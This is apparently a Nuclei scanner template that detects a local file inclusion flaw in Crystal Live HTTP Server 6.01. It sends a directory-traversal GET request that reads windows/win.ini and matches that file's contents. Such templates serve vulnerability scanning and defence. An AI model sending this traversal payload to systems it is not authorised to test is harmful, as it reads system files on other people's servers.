id: crystal-live-server-lfi

info:
  name: Crystal Live HTTP Server 6.01 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Crystal Live HTTP Server 6.01 is vulnerable to local file inclusion.
  reference: https://cxsecurity.com/issue/WLB-2019110127
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: lfi,crystal

requests:
  - method: GET
    path:
      - "{{BaseURL}}/../../../../../../../../../../../../windows/win.ini"

    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

# Enhanced by mp on 2023/01/15
